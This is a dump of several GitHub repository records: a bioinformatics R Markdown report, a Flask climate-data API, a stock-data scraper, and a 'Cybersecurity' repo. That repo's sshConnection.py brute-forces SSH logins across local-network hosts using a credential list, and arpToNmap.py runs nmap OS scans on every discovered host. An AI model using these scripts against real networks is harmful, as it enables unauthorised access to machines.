"text": "---\n html_document:\n toc: true\n highlight: zenburn\n theme: united\n---\n\n```{r setup, echo=FALSE}\nknitr::opts_chunk$set(tidy=TRUE, highlight=TRUE, dev=\"png\",\n cache=TRUE, highlight=TRUE, autodep=TRUE, warning=FALSE, error=FALSE,\n message=FALSE, prompt=TRUE, comment='', fig.cap='')\n```\n\n## Background information\nThis project is from Jesse Gray's lab, they are interested in looking at the\ncomposition of the enhancer sequences they had synthesized and stuck into some\nviral vectors. This is a second set of enhancer sequences they created;\nunlike the first set we are missing some barcode sequences.\n\nTo get to this table, we did took the enhancer sequences and trimmed off\nthe beginning and trailing bases. Then we made a bwa index of those\nenhancer sequences and aligned the query sequences to them and generated this\ntable:\n\n> infile=data/TN05_S1_L001_R1_001.fastq\n> prefix=TN05\n> out_dir=new-data\n> enhancers=metadata/TN03_newstrategy_trimmed.fa\n>\n> mkdir -p out-dir\n> bwa mem -t 6 $enhancers $infile > $out_dir/$prefix.sam\n> python ../code/single_bam_to_table.py $out_dir/$prefix.sam\n\nAs a first iteration, we did something super simple to get to this\npoint, we took the enhancer fragments and made a bwa database, then\naligned the reads to those. Before aligning the reads we stuck the\nbarcode for each read in the read name, so we could figure out which\nbarcode was associated with an alignment. Then we parsed the alignment\nfile to dump which enhancer sequence it aligned to, along with the\nbarcode that was used and some numbers about mapping quality and\nnumber of mismatches along with the sequence that was sequenced. The code to do all of this,\nand this report, is up on github [here](https://github.com/hbc/gray-enhancers).\n\nThe resulting file is pretty big, we spent some time messing around loading it\n into a SQLite and then a Postgres database, but that kept us from working with\ndplyr on the data. The ultimate solution was to just bite the bullet and load\neverything in, filtering it and writing the data out so we can just load\nthe filtered set.\n\nThe filtered set collapsed all of the same barcode + enhancer pairs into one,\nwith an added column nalignments that is the number of alignments of support\nfor that barcode + enhancer. The specific alignment kept for each barcode +\nenhancer pair was the one with the highest mapping quality and we only kept\nbarcode + enhancer pairs with at least five alignments of evidence.\n\n```{r read-data}\nlibrary(dplyr)\nlibrary(readr)\ndat = read_delim(\"TN05_mapped.tsv\", delim=\"\\t\") %>%\n group_by(barcode, ename) %>%\n mutate(nalignments = n()) %>%\n filter(nalignments > 5) %>%\n filter(mapq == max(mapq)) %>%\n do(head(., 1))\nsave(dat, file=\"enhancers.RData\")\n```\n\nNow we can just read the small data file and force the garbage collection to\nrun to free up the memory we used:\n\n```{r read-data-file}\nload(\"enhancers.RData\")\ngc()\n```\n\nThis is a much smaller set to work with, and we didn't lose much information.\n\nMost barcode-enhancer pairs have hundreds of alignments. We can see an uptick\nin rare barcode-enhancer pairs with less than ten alignments, those are likely\nsequencing errors in the barcode or other confused mappings.\n\n```{r alignment-distribution}\nlibrary(ggplot2)\nggplot(dat, aes(nalignments, color=mapq)) + geom_density() +\n theme_bw(base_size=10) +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n xlab(\"number of alignments\") +\n ylab(\"barcodes-enhancer pairs\") + scale_x_log10()\n```\n\nMapping quality has peaks around 10, 20 and 60.\n\n```{r quality-peaks}\nggplot(dat, aes(mapq)) + geom_histogram() +\n theme_bw(base_size=10) +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nHere we check to see if barcode-enhancer pairs with few alignments also have lower\nquality alignments; looks like that is not hte case.\n\n```{r alignment-distribution-by-quality}\ndat$quality <- ifelse(dat$mapq >= 60, \"high\", ifelse(dat$mapq < 60 & dat$mapq >= 20,\n \"medium\", \"low\"))\nggplot(dat, aes(nalignments, fill=quality)) + geom_histogram() +\n theme_bw(base_size=10) +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n xlab(\"number of alignments\") +\n ylab(\"barcodes-enhancer pairs\") + scale_x_log10()\n```\n\nSome barcodes align to multiple enhancers:\n\n```{r confused-barcodes}\nggplot(dat %>% group_by(barcode) %>% summarise(enhancers=n()), aes(enhancers)) +\n geom_histogram() +\n theme_bw(base_size=10) +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n scale_y_sqrt()\n```\n\nWe will drop these since we don't know which enhancer they go to.\n\n```{r drop-confused-barcodes}\ndat = dat %>% group_by(barcode) %>% filter(n() == 1)\n```\n\nEnhancers have on average 100 different barcodes covering them:\n\n```{r enhancer-coverage}\nggplot(dat %>% group_by(ename) %>% summarise(barcodes=n()), aes(barcodes)) +\n geom_histogram() +\n theme_bw(base_size=10) +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n scale_y_sqrt() + scale_x_log10() + ylab(\"enhancers\")\n```\n\nWe'll write out this cleaned key now, dropping the nonsense columns.\n\n```{r clean-output}\ndrop_cols = c(\"eid\", \"species\", \"subtype\")\nwrite.table(dat[, !colnames(dat) %in% drop_cols], file=\"TN05_cleaned.csv\", sep=\",\", quote=FALSE, col.names=TRUE, row.names=FALSE)\n```\n"
}
] | 9 |
goblebla/SQlAlchemy | https://github.com/goblebla/SQlAlchemy | 43dccd1cafcf75d8c1820fd9e6033694990693b7 | 6b79701012f4cc69d4188462253e2d10174048c2 | 57679714079da9ff396bb15d956fc8faf56051dd | refs/heads/master | 2022-09-06T18:34:20.300326 | 2020-05-25T23:14:49 | 2020-05-25T23:14:49 | 265,156,892 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6865277290344238,
"alphanum_fraction": 0.6950396299362183,
"avg_line_length": 31.759614944458008,
"blob_id": "bacbe305318ef1fede03159ce02065d0f0b6aedb",
"content_id": "54aa07bfb9ee458a5f8b35c13a74be87fa1a9c94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3407,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 104,
"path": "/climate_app.py",
"repo_name": "goblebla/SQlAlchemy",
"src_encoding": "UTF-8",
"text": "\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func, inspect\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n# Database setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\", echo=False)\n# Reflect an existing database into new model\nBase = automap_base()\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n\n#Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n# Create our session (link) from python to the DB\nsession = Session(engine)\n\n#Flask Setup\napp = Flask(__name__)\n\n#Flask Routes\[email protected](\"/\")\ndef welcome():\n return( \n f\"Welcome to Surf's Up! - Hawaii's Climate API<br/>\"\n f\"Available Routes:<br/>\"\n f\"Precipitation Data /api/v1.0/precipitaton<br/>\"\n f\"Station Data /api/v1.0/stations<br/>\"\n f\"Temperature Yearly Data /api/v1.0/tobs<br/>\"\n f\"MIN/AVG/MAX Temperature Timeline Data<br/>\"\n f\"Start Date: /api/v1.0/<start><br/>\"\n f\"End Date: /api/v1.0/<start>/<end><br/>\"\n )\n\[email protected](\"/api/v1.0/precipitaton\")\ndef precipitaton():\n \"\"\"Returns a list of precipitations from last year\"\"\"\n # Query dates ordered by descending and retreiving the end date value\n end_date = session.query(measurement.date).order_by(measurement.date.desc()).first()\n end_date = end_date[0]\n\n ##Calculating the date 1 year ago from today\n year_ago = dt.datetime.strptime(end_date, \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n #Query to retreive the data and precipitation scores\n results_precipitation = session.query(measurement.date, measurement.prcp)\\\n .filter(measurement.date >= year_ago).all()\n\n #Convert list of tuples into normal list\n precipitation_dict = dict(results_precipitation)\n\n return jsonify(precipitation_dict)\n\[email protected](\"/api/v1.0/stations\")\ndef stations():\n station_data = session.query(measurement.station).group_by(measurement.station).all()\n #Converting list o ftuples into normal list\n stations_list = list(np.ravel(station_data))\n\n return jsonify(stations_list)\n\[email protected](\"/api/v1.0/tobs\")\ndef tobs():\n end_date = session.query(measurement.date).order_by(measurement.date.desc()).first()\n end_date = end_date[0]\n\n year_ago = dt.datetime.strptime(end_date, \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n results_tobs = session.query(measurement.date, measurement.tobs)\\\n .filter(measurement.date >= year_ago).all()\n\n tobs_list = list(results_tobs)\n\n return jsonify(tobs_list)\n\[email protected](\"/api/v1.0/<start>\")\ndef start(start=None):\n from_start = session.query(measurement.date, func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs))\\\n .filter(measurement.date >= start)\\\n .group_by(measurement.date).all()\n\n from_start_list = list(from_start)\n return jsonify(from_start_list)\n\[email protected](\"/api/v1.0/<start>/<end>\")\ndef start_end(start=None, end=None):\n between_dates = session.query(measurement.date, func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs))\\\n .filter(measurement.date >= start)\\\n .filter(measurement.date <= end)\\\n .group_by(measurement.date).all()\n\n between_date_list = list(between_dates)\n return jsonify(between_date_list)\n\n\nif __name__ == '__main__':\n app.run(debug=True)"
}
] | 1 |
ss-hue/Cybersecurity | https://github.com/ss-hue/Cybersecurity | 8a29fe3efe33a731b7dca40dad2766f746ea37e2 | e69eaa1f22f8152e509355417f2cf981cf84a401 | 47611411cd7d8fdff4ff528abd70c6fac1302b97 | refs/heads/main | 2023-06-27T00:47:40.667569 | 2021-07-27T02:30:57 | 2021-07-27T02:30:57 | 389,748,686 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8275862336158752,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 42.5,
"blob_id": "518211f0b8404f9a149f6e37ec996e391dbff11f",
"content_id": "481341d64d7bcc41daf62275fd32f2b0ae9e02e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "# Cybersecurity\nThis is a modest repository with some Cybersecurity scripts in Python.\n"
},
{
"alpha_fraction": 0.6350975036621094,
"alphanum_fraction": 0.6540390253067017,
"avg_line_length": 37.191490173339844,
"blob_id": "4e3716ba0515a8861a650e75bed1bef51a4bf020",
"content_id": "9dee767210f6c03852286d0929844483f1568baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1795,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 47,
"path": "/sshConnection.py",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport paramiko\nimport sys, os\nimport subprocess\nimport time\n\n#This will accept a rainbow table in a file.txt\nfile = sys.argv[1]\n\n#Broadcasting to all local network devices to update arp table\nbroadcast = subprocess.Popen([\"ping -c 12 192.168.1.255\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\ntime.sleep(15)\n#Using arp -a\nhost = subprocess.Popen([\"arp -a | egrep -o '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,2}'\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n#stdout = str(host.communicate()[0].decode(\"ascii\")).split()\nstdout = host.communicate()[0].decode(\"ascii\").split()\n\nprint(stdout)\n\ndef SSHLogin(host, port, username, password):\n \n try:\n ssh = paramiko.SSHClient()\n #If we don't have a server key enabled (which we don't, because we are scanning), then ignore the fact that the server host key is not in our list of trusted keys.\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n #Performs the login\n ssh.connect(host, port=port, username=username, password=password)\n ssh_session = ssh.get_transport().open_session()\n #Here we test whether or not we have an active ssh session (meaning that those particular credentials are valid for that particular machine).\n if ssh_session.active:\n print(\"SSH login successful on {}:{}, with username {} and password {}\".format(host, port, username, password))\n else:\n print(\"SSH login failed\")\n except Exception as e:\n return\n \n ssh.close()\n\nwith open(file, \"r\") as f:\n for l in f:\n line = l.split()\n for host in stdout:\n print(host, 22, line[0], line[1])\n SSHLogin(host, 22, line[0], line[1])\nf.close()\n"
},
{
"alpha_fraction": 0.5719217658042908,
"alphanum_fraction": 0.5880322456359863,
"avg_line_length": 23.77142906188965,
"blob_id": "3840b26bc8b3d940e7d4d9aa247c83a1d3f9a270",
"content_id": "57edcb485650f8ed3aaa1b40fbc8ccf76caab2c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 35,
"path": "/arpToNmap.py",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport sys, os, re\nimport subprocess\nimport time\n\n\n\nhdict = {}\n\nhost = subprocess.Popen([\"arp -a | egrep -o '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,2}'\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\nhost_out = host.communicate()[0].decode(\"ascii\").split()\n\n\n#print(host_out)\n\nfor host in host_out:\n \n if \"192\" in host:\n \n #print(\"sudo nmap -O {}\".format(host))\n nmap = subprocess.Popen([\"sudo nmap -O {}\".format(host)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n #output is str type.\n output = nmap.communicate()[0].decode(\"ascii\")\n hdict[host] = re.search(\"MAC Address: .*\", output)\n print(output)\n\n\n\n \n\nfor ip, mac in hdict.items():\n if mac is not None:\n print(\"{} belongs to {}\".format(ip, mac.group())) \n\n"
}
] | 3 |
sbates130272/donard_tools | https://github.com/sbates130272/donard_tools | 2669ba5722cc521c9d1af9e116092c46db28d90c | 5d7d3a1ab8a8b5fca365a6f33878a59307dca8aa | d180ce18d91e7667c68593668946a015dd5943f1 | refs/heads/master | 2021-07-12T19:22:36.039947 | 2016-11-30T23:03:40 | 2016-11-30T23:03:40 | 25,712,840 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.47580087184906006,
"alphanum_fraction": 0.5211482644081116,
"avg_line_length": 29.17154884338379,
"blob_id": "e0f8c0bb089981a3970f5fffe55220c3afc8c7b0",
"content_id": "b1422ccc5cc0dc5e39d894abf12aef666ce38630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7211,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 239,
"path": "/pcicards/pcicards",
"repo_name": "sbates130272/donard_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n########################################################################\n##\n## Copyright 2014 PMC-Sierra, Inc.\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You may\n## obtain a copy of the License at\n## http://www.apache.org/licenses/LICENSE-2.0 Unless required by\n## applicable law or agreed to in writing, software distributed under the\n## License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n## CONDITIONS OF ANY KIND, either express or implied. See the License for\n## the specific language governing permissions and limitations under the\n## License.\n##\n########################################################################\n\n########################################################################\n##\n## Author: Logan Gunthorpe\n##\n## Date: Oct 23, 2014\n##\n## Description:\n## Simple script to print human readable information on the\n## physical PCI cards in the donard machine. The script should\n## be reasonably general but is not gaurenteed to be fully correct\n## on any other motherboard but the X9DRG-QF from SuperMicro\n##\n########################################################################\n\n\nimport os\nimport glob\n\ndevices = {(0x11f8, 0xf117) : \"PMC Mt Ramon NVMe/DMI\",\n (0x111d, 0x80d1) : \"PMC Princeton NVMe\",\n (0x11f8, 0x8543) : \"PMC Saratoga PCIe Switch\",\n (0x1425, 0x5001) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5401) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5501) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5601) : \"Chelsio T520-CR 2x10G Eth\",\n (0x144d, 0xa820) : \"Samsung NVMe\",\n (0x10de, 0x1022) : \"Nvidia Tesla K20c\",\n (0x10b5, 0x8724) : \"Aplicata 4xM.2 Switch\",\n (0x1b85, 0x6018) : \"Unknown M.2 NVME SSD\",\n}\n\ndef cat(fname):\n return open(fname).read().strip()\n\nmotherboard = cat(\"/sys/devices/virtual/dmi/id/board_name\")\n\nif motherboard == \"X9DRG-QF\":\n slot_names = {\"0000:00:01.0\" : \"Slot 10\",\n \"0000:00:02.0\" : \"Slot 2 \",\n \"0000:00:03.0\" : \"Slot 4 \",\n \"0000:80:00.0\" : \"Slot 11\",\n \"0000:80:01.0\" : \"Slot 9 \",\n \"0000:80:02.0\" : \"Slot 8 \",\n \"0000:80:03.0\" : \"Slot 6 \",\n }\nelse:\n slot_names = {}\n\nmounts = [x.split() for x in open(\"/proc/mounts\")]\n\npci_ids = {}\ntry:\n cur_vendor = None\n for x in open(\"/usr/share/misc/pci.ids\"):\n if not x.strip(): continue\n if x.startswith(\"#\"): continue\n if x.startswith(\"\\t\\t\"): continue\n\n if x.startswith(\"\\t\"):\n device, name = x.split(\" \", 1)\n device = int(device, 16)\n pci_ids[(cur_vendor, device)] = name.strip()\n else:\n cur_vendor, name = x.split(\" \", 1)\n cur_vendor = int(cur_vendor, 16)\nexcept IOError:\n pass\n\nignored_root_ports = set([(0x1912, 0x0012), #Renesas PCie-PCI bridge\n (0x1912, 0x0013), #Renesas PCIe Switch (Matrox)\n ])\n\ndef filter_duplicates(devs):\n counts = {}\n\n for dev in devs:\n nonfuncdev = dev.rsplit(\".\", 1)[0]\n a,b = counts.get(nonfuncdev, (0,0))\n\n devc = len(glob.glob(os.path.join(dev, \"0000:*\")))\n\n counts[nonfuncdev] = (a+1, b+devc)\n\n def filt(dev):\n nonfuncdev, func = dev.rsplit(\".\", 1)\n devs = len(glob.glob(os.path.join(dev, \"0000:*\")))\n a,b = counts[nonfuncdev]\n\n if b == 0 and int(func == 0):\n return 0\n\n return a > 1 and not devs\n\n return [dev for dev in devs if not filt(dev)]\n\n\ndef find_slots():\n nodes = {}\n\n for slot, name in slot_names.items():\n dev = os.path.join(\"/sys/bus/pci/devices/\", slot)\n\n numa = int(cat(os.path.join(dev, \"numa_node\")))\n\n nodes.setdefault(numa, []).append(dev)\n\n return nodes\n\ndef print_dev(slot, devpath, indent=0):\n pcibus = os.path.basename(devpath)\n idx = int(pcibus.split(\":\")[1], 16)\n pcibus = pcibus.split(\":\", 1)[1]\n\n vendor = int(cat(os.path.join(devpath, \"vendor\")), 16)\n device = int(cat(os.path.join(devpath, \"device\")), 16)\n dclass = int(cat(os.path.join(devpath, \"class\")), 16)\n\n if (vendor, device) in devices:\n name = devices[(vendor,device)]\n elif (vendor, device) in pci_ids:\n name = pci_ids[(vendor, device)]\n elif dclass == 0x010802:\n name = \"NVMe Card (Unknown Vendor)\"\n else:\n name = \"Unknown Card\"\n\n provides = []\n\n for block in glob.glob(os.path.join(devpath, \"block\", \"*\")):\n block = os.path.basename(block)\n mount_pt = \"\"\n for m in mounts:\n if block in m[0]:\n mount_pt = m[1]\n break\n provides.append(\"%-10s %s\" % (block, mount_pt))\n\n for block in glob.glob(os.path.join(devpath, \"nvme\", \"*\")):\n block = os.path.basename(block)\n mount_pt = \"\"\n for m in mounts:\n if block in m[0]:\n mount_pt = m[1]\n break\n provides.append(\"%-10s %s\" % (block, mount_pt))\n\n net = sorted(glob.glob(os.path.join(devpath, \"net\", \"*\")))\n if net:\n provides.append(\", \".join(os.path.basename(n) for n in net))\n\n mtramon = glob.glob(os.path.join(devpath, \"mtramon\", \"*\"))\n for m in mtramon:\n provides.append(os.path.basename(m))\n\n drm = glob.glob(os.path.join(devpath, \"drm\", \"*\"))\n for d in drm:\n provides.append(\"dri/\" + os.path.basename(d))\n\n if vendor == 0x1425 and not net:\n return\n\n if not provides: provides.append(\"\")\n\n name = \" \"*indent + name\n name = name[:27]\n print \" %-7s %s - %04x:%04x %-27s %s\" % (slot, pcibus, vendor,\n device, name,\n provides[0])\n\n for p in provides[1:]:\n print \" \"*61, p\n\n\ndef print_none(slot):\n print \" %-7s - None\" % (slot)\n\n\ndef print_devs(slot, devpaths, indent=0):\n for devpath in sorted(devpaths):\n try:\n print_dev(slot, devpath, indent)\n except IOError:\n continue\n\n slot = \"\"\n\n dev_class = int(cat(os.path.join(devpath, \"class\")), 16)\n if dev_class == 0x60400:\n new_devpaths = glob.glob(os.path.join(devpath, \"0000:*\"))\n print_devs(slot, new_devpaths, indent=indent+1)\n\ndef print_slots(slots):\n\n slot_num = 1\n for path in filter_duplicates(slots):\n try:\n slot = slot_names.get(os.path.basename(path),\n \"Slot %d\" % slot_num)\n slot_num += 1\n\n devpaths = glob.glob(os.path.join(path, \"0000:*\"))\n except IOError:\n print_none(slot)\n continue\n except IndexError:\n print_none(slot)\n continue\n\n if not devpaths:\n print_none(slot)\n continue\n\n print_devs(slot, devpaths)\n\n\nif __name__ == \"__main__\":\n nodes = sorted(find_slots().items())\n\n for node, slots in nodes:\n if len(nodes) > 1:\n print \"Numa Node %d:\" % node\n print_slots(slots)\n"
},
{
"alpha_fraction": 0.538766086101532,
"alphanum_fraction": 0.5513032078742981,
"avg_line_length": 30.905263900756836,
"blob_id": "a5ca60ecfd3bd50e26ba2257e8e0827c1fbf2c6f",
"content_id": "52db5a36d917a49f05d4093f6c6fc69262471b18",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3031,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 95,
"path": "/mknvfs/mknvfs",
"repo_name": "sbates130272/donard_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n########################################################################\n##\n## Copyright 2014 PMC-Sierra, Inc.\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You may\n## obtain a copy of the License at\n## http://www.apache.org/licenses/LICENSE-2.0 Unless required by\n## applicable law or agreed to in writing, software distributed under the\n## License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n## CONDITIONS OF ANY KIND, either express or implied. See the License for\n## the specific language governing permissions and limitations under the\n## License.\n##\n########################################################################\n\n########################################################################\n##\n## Author: Logan Gunthorpe\n##\n## Date: Oct 23, 2014\n##\n## Description:\n## This script recreates filesystems in psuedo-NVM devices that\n## loose their contents on reboots. (eg. pmem devices and mtramon\n## devices that do not have batteries.)\n##\n########################################################################\n\n\nfrom __future__ import print_function\n\nimport os\nimport subprocess as sp\nimport glob\nimport shutil\nimport stat\n\ndef update_mounts():\n global mounts\n mounts = dict([(x.split()[0], x.split()[1]) for x in open(\"/proc/mounts\")])\nupdate_mounts()\n\ndef mknvfs(dev=None, uuid=None):\n if not dev: return\n if dev in mounts:\n print(\"%s already mounted.\" % dev)\n return\n\n if not os.path.exists(dev):\n print(\"%s does not exist.\" % dev)\n return\n\n try:\n old_uuid = sp.check_output([\"blkid\", dev])\n except sp.CalledProcessError:\n uuid = [\"-U\", uuid] if uuid else []\n\n try:\n print(\"Creating filesystem on %s\" % dev)\n sp.check_call([\"mkfs.ext4\", dev] + uuid, stdout=open(os.devnull, \"w\"))\n except sp.CalledProcessError:\n print(\"Unable to create filesystem on %s\" % dev)\n return\n\n try:\n print(\"Mounting %s\" % dev)\n sp.check_call([\"mount\", dev])\n update_mounts()\n except sp.CalledProcessError:\n print(\"Unable to mount %s\" % dev)\n return\n\n test_dat = os.path.join(mounts[dev], \"test.dat\")\n if not os.path.exists(test_dat):\n shutil.copy(\"/root/test.dat\", test_dat)\n\n os.chmod(test_dat, (stat.S_IRUSR | stat.S_IWUSR |\n stat.S_IRGRP | stat.S_IWGRP |\n stat.S_IROTH | stat.S_IWOTH))\n\ndef find_nvme_from_dmi(*options):\n for o in options:\n g = glob.glob(os.path.join(o, \"block\", \"nvme*\"))\n if g:\n return os.path.join(\"/dev\", os.path.basename(g[0]))\n return None\n\nif __name__ == \"__main__\":\n mknvfs(\"/dev/pmem0\")\n mknvfs(\"/dev/mtramonb1\")\n mknvfs(find_nvme_from_dmi(\"/sys/block/mtramonb1/device\",\n \"/sys/class/mtramon/mtramon1/device\"),\n uuid=\"cca4ad99-6daa-4f78-b6b1-c2391badc072\")\n"
}
] | 2 |
Yungxi/FinanceDataScraper | https://github.com/Yungxi/FinanceDataScraper | 903425a1ea71ca9fb3f179649f044676c342ae72 | fa87b4289714670fa086b7ec7cc032e3d11beee5 | b321cfd7b778f42a8a3a9b090aa8fb0dbf60fc06 | refs/heads/main | 2023-07-03T12:38:23.548686 | 2021-08-06T08:12:58 | 2021-08-06T08:12:58 | 393,306,134 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5561172962188721,
"alphanum_fraction": 0.5807212591171265,
"avg_line_length": 32.33707809448242,
"blob_id": "c8929b4650db15c9bcb0d7b11d01bc254e9ad6f8",
"content_id": "b0a938b3819f3a63f289c970f34549278606880a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2971,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 89,
"path": "/main.py",
"repo_name": "Yungxi/FinanceDataScraper",
"src_encoding": "UTF-8",
"text": "import yfinance as yf\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# Parameters for stock bot\nSTART_DATE = '2003-01-02'\nUPDATE_XLSX = True\n\nOUTPUT_FILENAME = \"IWMDaily.xlsx\"\n# MOVING_AVERAGES = list(range(25, 30)) #DO 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100\n# VOLUME_MOVING_AVERAGES = list(range(1, 200))\n\ntickers_list = ['IWM']\n\n\ndef fetch_data():\n if UPDATE_XLSX:\n data = yf.download(tickers_list, START_DATE)\n data.to_excel(OUTPUT_FILENAME)\n\n return pd.read_excel(OUTPUT_FILENAME)\n\n\ndef algorithm():\n # Downloading data\n original_data = fetch_data()\n data = fetch_data()\n cp_values = []\n\n # Add SMA columns\n print(\"Generating SMA Columns...\")\n for MOVING_AVERAGE in MOVING_AVERAGES:\n data['SMA_' + str(MOVING_AVERAGE)] = original_data['Adj Close'].rolling(MOVING_AVERAGE).mean()\n\n # Add SMA columns\n print(\"Generating SMA VOLUME Columns...\")\n for VOLUME_MOVING_AVERAGE in VOLUME_MOVING_AVERAGES:\n data['VSMA_' + str(VOLUME_MOVING_AVERAGE)] = original_data['Volume'].rolling(VOLUME_MOVING_AVERAGE).mean()\n\n # Editing df\n data.set_index('Date', inplace=True)\n data['SPY∆'] = data.pct_change()['Adj Close'] + 1\n\n data['OWNED'] = True\n\n # Generate Data\n for MOVING_AVERAGE in MOVING_AVERAGES:\n print(\"Testing at SMA = \" + str(MOVING_AVERAGE))\n\n SMA_COL = 'SMA_' + str(MOVING_AVERAGE)\n\n for VOLUME_MOVING_AVERAGE in VOLUME_MOVING_AVERAGES:\n print(\"Testing at volume SMA = \" + str(VOLUME_MOVING_AVERAGE))\n\n VOL_SMA_COL = 'SMA_' + str(VOLUME_MOVING_AVERAGE)\n\n data['MAX'] = 0\n data['MIN'] = 10000000\n data['OWNED'] = True\n\n for i in range(1, len(data) - 1): # for each row in the dataframe\n # if not data.iloc[i]['OWNED']:\n if data.iloc[i]['Volume'] < data.iloc[i]['VSMA_' + str(VOLUME_MOVING_AVERAGE)]:\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = True\n elif ((data.iloc[i]['Adj Close'] < data.iloc[i]['SMA_' + str(MOVING_AVERAGE)]) and (\n data.iloc[i]['Adj Close'] < data.iloc[i - 1]['Adj Close'])):\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = True\n else:\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = False\n\n data['Final'] = np.where(data['OWNED'], data['SPY∆'], 1)\n data['FinalCP_' + str(VOLUME_MOVING_AVERAGE) + '_' + str(MOVING_AVERAGE)] = data['Final'].cumprod(\n skipna=True)\n\n cp_values.append([MOVING_AVERAGE, VOLUME_MOVING_AVERAGE,\n data['FinalCP_' + str(VOLUME_MOVING_AVERAGE) + '_' + str(MOVING_AVERAGE)].iat[-1]])\n\n data.to_excel('all_values.xlsx')\n print(data)\n\n print(cp_values)\n # data.plot()\n # plt.show(block=True)\n\n\nfetch_data()\n# Execution of stock bot\n# algorithm()\n"
}
] | 1 |
niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB | https://github.com/niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB | a8bc43a3911cf6c8405c5d2f6acbb96289c886e7 | ecbca85ff622e19645a54efb97bd67eadb8d22b5 | 040011e9b1f99b349ebc92cee36dcafccedff73d | refs/heads/master | 2021-10-25T14:54:00.550510 | 2021-10-23T12:20:07 | 2021-10-23T12:20:07 | 136,803,473 | 16 | 7 | null | null | null | null | null | [
{
"alpha_fraction": 0.5660325884819031,
"alphanum_fraction": 0.61277174949646,
"avg_line_length": 27.944881439208984,
"blob_id": "4f5bcf26ee781f86ac77dc3647814d5a4c603ddc",
"content_id": "c7cd7331f1fed8afcf64047aaf99ff4eed80526a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 127,
"path": "/CMFD_DoG_ORB.py",
"repo_name": "niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB",
"src_encoding": "UTF-8",
